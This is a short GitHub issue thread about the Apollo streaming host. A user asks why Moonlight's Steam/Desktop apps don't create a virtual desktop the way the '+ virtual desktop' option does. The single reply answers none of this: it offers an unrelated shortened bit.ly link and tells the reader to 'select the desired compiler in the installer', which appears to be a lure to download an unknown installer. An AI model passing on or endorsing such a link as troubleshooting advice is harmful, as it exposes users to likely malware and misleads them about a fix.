### ISSUE TITLE
Moondeck "+ virtual desktop" works but not STEAM/DESKTOP

### ISSUE THREAD

**Issue by mysteriousHerb** [ClassicOldSong/Apollo#25]
hi, doing a fresh install of apollo after uninstalled sunshine.
On my moonlight app (steamdeck), i can press virtual desktop and it works by creating a new virtual desktop.
If I use steam / desktop app (default) it doesnt do this however. is it supposed to do that?

**Comment by Klevente12** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer
